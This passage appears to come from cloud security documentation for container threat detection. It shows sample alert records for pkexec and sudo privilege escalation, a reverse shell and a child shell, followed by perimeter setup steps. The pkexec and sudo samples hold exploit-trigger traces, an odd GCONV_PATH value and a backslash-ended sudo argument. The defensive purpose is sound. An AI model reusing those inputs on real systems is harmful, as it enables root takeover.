"OBTAIN_CAPABILITIES",         "OBTAIN_CAPABILITIES_VULNERABILITIES"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"pkexec\"",           "size": "142312",           "sha256": "1bea8094b78a3910345d80af3d182390fda07ae5788352651eb7773505dc39af",           "hashedSize": "142312",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"pkexec\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"GCONV_PATH\"",             "val": "\"junk\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-polkit-2025-07-21-23-06-20-utc\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HOME\"",             "val": "\"/home/ubuntu\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"TERM\"",             "val": "\"xterm\""           },           {             "name": "\"SHLVL\"",             "val": "\"1\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"_\"",             "val": "\"/tmp/pkexec\""           }         ],         "pid": "9",         "parentPid": "1",         "userId": "0"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_polkit_local_privilege_escalation_vulnerability"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0004/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/1bea8094b78a3910345d80af3d182390fda07ae5788352651eb7773505dc39af/detection"         }       ],       "relatedFindingUri": {}     }   } }     

Escalamento de privilégios: potencial escalamento de privilégios do Sudo (CVE-2021-3156)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Privilege Escalation: Sudo Potential Privilege Escalation (CVE-2021-3156)",     "chokepoint": {},     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2025-07-22T00:07:48Z"       }     ],     "createTime": "2025-07-22T00:07:54.853Z",     "database": {},     "dataProtectionKeyGovernance": {},     "eventTime": "2025-07-22T00:07:54.627Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/770715367326",           "timestamp": "2025-07-22T00:07:48.052030557Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "EXPLOITATION_FOR_PRIVILEGE_ESCALATION"       ],       "additionalTactics": [         "DEFENSE_EVASION",         "PRIVILEGE_ESCALATION",         "RESOURCE_DEVELOPMENT"       ],       "additionalTechniques": [         "ABUSE_ELEVATION_CONTROL_MECHANISM",         "ABUSE_ELEVATION_CONTROL_MECHANISM_SUDO_AND_SUDO_CACHING",         "OBTAIN_CAPABILITIES",         "OBTAIN_CAPABILITIES_VULNERABILITIES"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"sudo\"",           "size": "142312",           "sha256": "1bea8094b78a3910345d80af3d182390fda07ae5788352651eb7773505dc39af",           "hashedSize": "142312",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"sudo\"",           "\"-s\"",           "\"123\\\\\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-sudo-potential-2025-07-21-23-57-06-utc\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HOME\"",             "val": "\"/home/ubuntu\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"TERM\"",             "val": "\"xterm\""           },           {             "name": "\"SHLVL\"",             "val": "\"1\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"_\"",             "val": "\"/tmp/sudo\""           }         ],         "pid": "9",         "parentPid": "1",         "userId": "0"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_sudo_potential_privilege_escalation"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0004/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/1bea8094b78a3910345d80af3d182390fda07ae5788352651eb7773505dc39af/detection"         }       ],       "relatedFindingUri": {}     }   } }     

Reverse Shell

{   "finding": {     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "state": "ACTIVE",     "category": "Reverse Shell",     "sourceProperties": {       "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",       "Environment_Variables": ["HOSTNAME\u003dreverse-shell",       "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",       "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",       "KUBERNETES_SERVICE_PORT\u003d443",       "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",       "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p       ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"       , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",       "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",       "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",       "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",       "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",       "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],       "Container_Image_Uri": "CONTAINER_IMAGE_URI",       "Process_Binary_Fullpath": "BINARY_PATH",       "Container_Creation_Timestamp": {         "seconds": 1.617989861E9,         "nanos": 0.0       },       "Pod_Name": "POD_NAME",       "Container_Name": "CONTAINER_NAME",       "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],       "Pid": 15.0,       "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,       "Container_Image_Id": "CONTAINER_IMAGE_ID",       "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",       "Pod_Namespace": "default",       "VM_Instance_Name": "INSTANCE_ID",       "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,       "description": "A process started with stream redirection to a remote       connected socket. With a reverse shell, an attacker can communicate from a       compromised workload to an attacker-controlled machine. The attacker can       then command and control the workload to perform desired actions, for       example as part of a botnet.",       "Parent_Pid": 1.0,       "Process_Creation_Timestamp": {         "seconds": 1.61798989E9,         "nanos": 6.16573691E8       }     },     "securityMarks": {       "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"     },     "eventTime": "2021-04-09T17:38:10.904Z",     "createTime": "2021-04-09T17:38:15.486Z",     "propertyDataTypes": {       "Container_Image_Id": {         "primitiveDataType": "STRING"       },       "Container_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Pod_Namespace": {         "primitiveDataType": "STRING"       },       "Environment_Variables": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "Reverse_Shell_Stdin_Redirection_Dst_Ip": {         "primitiveDataType": "STRING"       },       "description": {         "primitiveDataType": "STRING"       },       "Process_Arguments": {         "listValues": {           "propertyDataTypes": [{             "primitiveDataType": "STRING"           }]         }       },       "Pid": {         "primitiveDataType": "NUMBER"       },       "Reverse_Shell_Stdin_Redirection_Src_Ip": {         "primitiveDataType": "STRING"       },       "Container_Image_Uri": {         "primitiveDataType": "STRING"       },       "Reverse_Shell_Stdin_Redirection_Dst_Port": {         "primitiveDataType": "NUMBER"       },       "Pod_Name": {         "primitiveDataType": "STRING"       },       "Process_Creation_Timestamp": {         "dataType": "TIMESTAMP",         "structValue": {           "fields": {             "seconds": {               "primitiveDataType": "NUMBER"             },             "nanos": {               "primitiveDataType": "NUMBER"             }           }         }       },       "Reverse_Shell_Stdin_Redirection_Src_Port": {         "primitiveDataType": "NUMBER"       },       "Parent_Pid": {         "primitiveDataType": "NUMBER"       },       "VM_Instance_Name": {         "primitiveDataType": "STRING"       },       "Container_Name": {         "primitiveDataType": "STRING"       },       "Process_Binary_Fullpath": {         "primitiveDataType": "STRING"       }     },     "severity": "CRITICAL",     "workflowState": "NEW",     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "projectDisplayName": "PROJECT_ID",     "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parentDisplayName": "PROJECT_ID",     "type": "google.container.Cluster"   } }   

Unexpected Child Shell

{   "finding": {     "access": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Unexpected Child Shell",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_URI",         "imageId": "CONTAINER_IMAGE_ID"       }     ],     "createTime": "2023-06-29T17:34:13.765Z",     "database": {},     "description": "A process should not normally create child shell processes, spawn a child shell process.",     "eventTime": "2023-06-29T17:34:13.492Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "ns": "default",           "name": "CONTAINER_NAME",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_URI",               "imageId": CONTAINER_IMAGE_ID"             }           ]         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER"       ]     },     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/home/vmagent/app/temp/dash\"",           "size": "31376",           "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",           "hashedSize": "31376",           "partiallyHashed": false         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"./temp/dash\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://10.52.113.1:443\""           },           {             "name": "\"PYTHONUNBUFFERED\"",             "val": "\"1\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"10.52.113.1\""           },           {             "name": "\"PATH\"",             "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"PWD\"",             "val": "\"/home/vmagent/app\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"SHLVL\"",             "val": "\"1\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"PORT\"",             "val": "\"8080\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"10.52.113.1\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://10.52.113.1:443\""           },           {             "name": "\"_\"",             "val": "\"./temp/dash\""           }         ],         "pid": "15",         "parentPid": "14"       },       {         "binary": {           "path": "\"/home/vmagent/app/temp/consul\"",           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"./temp/consul\""         ],         "argumentsTruncated": false,         "pid": "14",         "parentPid": "13"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "display_name": "CLUSTER_ID",     "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "project_display_name": "PROJECT_ID",     "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parent_display_name": "PROJECT_ID",     "type": "google.container.Cluster",     "folders": []   },   "sourceProperties": {     "Process_Arguments": [       "./temp/dash"     ],     "Pid": 15,     "Process_Creation_Timestamp": {       "seconds": 1688060050,       "nanos": 207040864     },     "Container_Image_Uri": "CONTAINER_IMAGE_URI",     "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",     "VM_Instance_Name": "INSTANCE_ID",     "Pod_Name": "POD_NAME",     "Pod_Namespace": "default",     "Container_Name": "CONTAINER_NAME",     "Container_Image_Id": "CONTAINER_IMAGE_ID",     "Container_Creation_Timestamp": {       "seconds": 1688060050,       "nanos": 0     },     "Parent_Pid": 14,     "Environment_Variables": [       "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",       "KUBERNETES_PORT_443_TCP_PORT=443",       "KUBERNETES_PORT=tcp://10.52.113.1:443",       "PYTHONUNBUFFERED=1",       "KUBERNETES_SERVICE_PORT=443",       "KUBERNETES_SERVICE_HOST=10.52.113.1",       "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",       "PWD=/home/vmagent/app",       "LANG=C.UTF-8",       "SHLVL=1",       "HOME=/root",       "KUBERNETES_PORT_443_TCP_PROTO=tcp",       "KUBERNETES_SERVICE_PORT_HTTPS=443",       "DEBIAN_FRONTEND=noninteractive",       "PORT=8080",       "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",       "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",       "_=./temp/dash"     ]   } }     

Analisar projetos protegidos por um perímetro de serviço

Se ativou o Security Command Center ao nível da organização após 7 de dezembro de 2023 e tiver um perímetro de serviço que bloqueia o acesso a determinados projetos e serviços, tem de conceder à conta de serviço da Deteção de ameaças de contentores acesso de entrada a esse perímetro de serviço. Caso contrário, a Deteção de ameaças de contentores não pode produzir descobertas relacionadas com os projetos e os serviços protegidos.

Para ativações ao nível da organização, o identificador da conta de serviço é um endereço de email no seguinte formato:

service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

No exemplo anterior, substitua ORGANIZATION_ID pelo identificador numérico da sua organização.

Se o seu cluster estiver dentro de um perímetro de serviço dos VPC Service Controls, certifique-se de que a containerthreatdetection.googleapis.com, a API Container Threat Detection, está listada como um serviço acessível. Para mais informações, consulte o artigo Vista geral do perímetro de serviço.

Para conceder a uma conta de serviço acesso de entrada a um perímetro de serviço, siga estes passos.

  1. Aceda aos VPC Service Controls.

    Aceda aos VPC Service Controls

  2. Na barra de ferramentas, selecione a sua Google Cloud organização.

  3. Na lista pendente, selecione a política de acesso que contém o perímetro de serviço ao qual quer conceder acesso.

    Lista de políticas de acesso

    Os perímetros de serviço associados à política de acesso aparecem na lista.

  4. Clique no nome do perímetro de serviço.

  5. Clique em Editar perímetro

  6. No menu de navegação, clique em Política de entrada.

  7. Clique em Adicionar regra.

  8. Configure a regra da seguinte forma:

    Atributos DE do cliente API

    1. Em Origem, selecione Todas as origens.
    2. Para Identidade, selecione Identidades selecionadas.
    3. No campo Adicionar utilizador/conta de serviço, clique em Selecionar.
    4. Introduza o endereço de email da conta de serviço. Se tiver contas de serviço ao nível da organização e do projeto, adicione ambas.
    5. Clique em Guardar.

    TO attributes of services/resources

    1. Para Projeto, selecione Todos os projetos.

    2. Para Serviços, selecione Todos os serviços ou selecione serviços específicos para os quais aparecem violações dos VPC Service Controls.

    Se um perímetro de serviço restringir o acesso a um serviço necessário, a Deteção de ameaças de contentores não pode produzir resultados para esse serviço.

  9. No menu de navegação, clique em Guardar.

Para mais informações, consulte o artigo Configurar políticas de entrada e saída.

O que se segue?